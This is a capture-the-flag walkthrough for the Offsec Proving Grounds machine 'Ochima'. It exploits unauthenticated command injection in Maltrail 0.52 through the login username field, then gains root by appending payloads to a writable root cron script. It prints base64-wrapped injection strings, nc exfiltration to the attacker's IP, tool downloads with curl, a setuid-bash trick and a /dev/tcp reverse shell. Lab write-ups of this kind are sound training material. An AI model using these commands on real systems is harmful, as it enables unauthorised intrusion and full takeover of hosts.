Ochima Offsec Proving Grounds Practice Labor Day CTF Machine Walkthrough
Check for the version on the web to get initial footfold. For root, check on writable file or monitor process, both works. Have fun.
Enumeration
sudo nmap -p- -Pn -v $ip -sS -A -T 4 -oN nmap.txtPort 22, 80 and 8338 open.
Port 80
Just a default apache page. Tried dirb and nothing much. Move to next port.
Port 8338
Running maltrail v0.52, google “maltrail 0.52 exploit”, we found an unauth RCE for version 0.53.
Go through the exploit, the vulnerable parameter is the login username. Use burp to intercept the traffic while click on the login button to verify the login path and parameter.
Testing if it vulnerable to RCE
You can just run the exploit or use burp to verify manually.
#Test manually via burp, at kali machine
echo "id|nc $KaliIP 80" | base64
nc -nvlp 80
#At burp, replace the username value with the base64 encoded value
username=;`echo+"aWR8bmasdTkyLjE2OC40NS4xNzYgODAK"+|+base64+-d+|+sh`
Time to get our first flag =D
#start nc listener
nc -nlvp 80
#Execute the maltrail exploit
python3 maltrail_exploit.py $KaliIP 80 http://$TargetIP:8338/login
Get our first flag at home directory.
Privilege Escalation
At home directory, we discover a tar file own by root. We can just cat the tar file and it actually back up the /etc folder. We found a SSH private key by searching “OPENSSH PRIVATE KEY”, you can do this by cat etc_backup.tar, then hit ctrl+shift+f, it should pop a find bar at bottom of your terminal. Then search “OPENSSH PRIVATE KEY”. Basically it just search text that appear in your terminal.
We copy the private key and try to SSH to the target machine, however it require password.
Try Peas, it helps.
#Transfer linpeas.sh to the target machine
#At kali
cd /path/to/linpeas.sh
python3 -m http.server 80
#At target machine
curl http://$kaliIP/linpeas.sh -o linpeas.sh
chmod +x linpeas.sh
./linpeas.shFrom linpeas result, we found a writable file that own by root.
Checking the script, since we has write permission, we can add in malicious payload to the file and execute by root.
Testing if the script run as cronjob
#add this line to the file and check /tmp if the file was created by root
echo "echo 1 > /tmp/1.txt" >> /var/backups/etc_Backup.sh
#Wait for few second, then check /tmp
ls -al /tmp
Always has alternative
Just in case, linpeas does not work on the target machine, we can use another tools to monitor processes which is pspy.
Download the pspy64s, transfer to the target machine and execute it.
#At kali
cd /path/to/pspy64s
python3 -m http.server 80
#At target machine
curl http://$KaliIP/pspy64s -o /tmp/pspy
chmod +x
timeout 2m /tmp/pspy💡💡In CTF, sometimes we don’t want to lose our shell, however by running pspy, we need to hit ctrl+c to stop the process result in losing our shell. Hence, we use timeout 2m to make the process terminate after 2 minutes. You can set by second eg 180s.
What if I can’t transfer file to the target machine
No worries, just use find to look for writable file
find / -type f -maxdepth 5 -writable 2>/dev/nullGetting Root shell
#at target machine
echo -n "chmod u+s /bin/bash" | base64
echo "echo -n 'Y2htb2QgdStzIC9iaW4vYmFzaA=='|base64 -d|bash" >> /var/backups/etc_Backup.sh
#wait for a few second
ls -al /bin/bash
/bin/bash -p
#You can use other payload as well such as
echo -n "sh -i >& /dev/tcp/$KaliIP/80 0>&1" | base64
echo "echo -n 'c2ggLWkgPiYgL2Rldi90Y3AvMTkyLjE2OC40NS4xNzYvODAgMD4mMQ=='|base64 -d|bash" >> /var/backups/etc_Backup.sh
Congratz !! Hope you learn something from this walkthrough. Check out my stories for other proving grounds machine walkthroughs. Leave a comment if you found another way to pawn this machine.